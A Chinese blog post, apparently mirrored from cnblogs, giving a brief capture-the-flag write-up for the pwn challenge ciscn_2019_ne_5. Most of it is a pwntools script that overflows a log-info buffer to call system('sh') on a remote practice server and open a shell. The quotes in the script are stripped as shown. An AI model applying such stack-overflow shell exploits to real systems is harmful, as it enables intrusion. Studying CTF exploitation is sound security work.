码迷,mamicode.com
首页 > 其他好文 > 详细

ciscn_2019_ne_5

时间:2020-02-04 10:22:26      阅读:92      评论:0      收藏:0      [点我收藏+]

标签:inpu   src   图片   div   lin   until   cti   cisc   please   

ret2text类型

从fflush中获取 “sh”   传参给system即可

技术图片

 

 脚本如下

from pwn import *

r=remote(node3.buuoj.cn,25488)
e=ELF(ciscn_2019_ne_5)
sys_plt=e.plt[system]
sh_addr=0x80482ea

r.recvuntil(Please input admin password:)
r.sendline(administrator)

r.recvuntil(0.Exit\n:)
r.sendline(1)

payload=a*0x4c+p32(sys_plt)+aaaa+p32(sh_addr)
r.recvuntil(Please input new log info:)
r.sendline(payload)

r.recvuntil(0.Exit\n:)
r.sendline(4)

r.interactive()

 

ciscn_2019_ne_5

标签:inpu   src   图片   div   lin   until   cti   cisc   please   

原文地址:https://www.cnblogs.com/gaonuoqi/p/12258414.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!